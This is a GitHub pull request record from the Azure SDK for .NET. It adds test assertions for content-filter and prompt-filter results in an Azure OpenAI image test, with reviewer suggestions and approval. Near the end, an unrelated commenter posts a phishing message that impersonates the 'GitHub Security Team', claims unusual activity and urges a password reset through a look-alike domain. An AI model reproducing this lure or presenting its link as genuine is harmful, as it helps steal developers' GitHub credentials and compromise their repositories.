### PR TITLE
test: Validate presence of `ContentFilterResults` and `PromptFilterResults` in Azure scenario

### PR DESCRIPTION
**Pull request by kdestin**
# Contributing to the Azure SDK

Please see our [CONTRIBUTING.md](https://github.com/Azure/azure-sdk-for-net/blob/main/CONTRIBUTING.md) if you are not familiar with contributing to this repository or have questions.

For specific information about pull request etiquette and best practices, see [this section](https://github.com/Azure/azure-sdk-for-net/blob/main/CONTRIBUTING.md#pull-request-etiquette-and-best-practices).

### CODE REVIEW

File: sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs [hunk 1]
```diff
@@ -50,6 +50,16 @@ public async Task CanGenerateImages(Service serviceTarget)
             ImageGenerationData firstImageLocation = imageGenerations.Data[0];
             Assert.That(firstImageLocation, Is.Not.Null);
             Assert.That(firstImageLocation.Url, Is.Not.Null.Or.Empty);
+
+            // ContentFilterResults and PromptFilterResults are currently Azure Only
+            if (serviceTarget is Service.Azure)
```
Comment (ninghu) [inline sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs:55]: If `Service.Azure` is enum type, then it should be 

```suggestion
            if (serviceTarget == Service.Azure)
```

File: sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs [hunk 2]
```diff
@@ -50,6 +50,16 @@ public async Task CanGenerateImages(Service serviceTarget)
...
+            {
+                foreach (ImageGenerationData data in imageGenerations.Data)
+                {
+                    Assert.That(data.ContentFilterResults, Is.Null.Or.Empty);
```
Comment (ninghu) [inline sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs:59]: Shouldn't it be: 

```suggestion
                    Assert.That(data.ContentFilterResults, Is.Not.Null.Or.Empty);
```

File: sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs [hunk 3]
```diff
@@ -50,6 +50,16 @@ public async Task CanGenerateImages(Service serviceTarget)
...
+                    Assert.That(data.PromptFilterResults, Is.Not.Null.Or.Empty);
```
Comment (ninghu) [inline sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs:60]: Can we also add code to check the fields inside ContentFilterResults and PromptFilterResults?

File: sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs (hunk 1 above)
Comment (kdestin) [reply sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs]: Resolved by https://github.com/ninghu/azure-sdk-for-net/pull/16/commits/90f2f2c8fd894dbd52b52a0d34e947a046726edd

File: sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs (hunk 2 above)
Comment (kdestin) [reply sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs]: Resolved by https://github.com/ninghu/azure-sdk-for-net/pull/16/commits/b314ffb7ec0523073271974da608f9c3018e2613

File: sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs (hunk 3 above)
Comment (kdestin) [reply sdk/openai/Azure.AI.OpenAI/tests/OpenAIImageTests.cs]: https://github.com/ninghu/azure-sdk-for-net/pull/16/commits/4181609d4fd660ad3af7bc1115eefbfda6b04645

**Review by ninghu — APPROVED** [review]

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Pull request merged**